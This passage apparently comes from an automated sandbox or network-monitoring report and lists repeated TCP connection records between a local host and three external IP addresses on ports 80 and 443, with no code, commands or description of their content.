              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
              Source: global trafficTCP traffic: 192.168.2.3:49701 -> 41.63.0.22:443
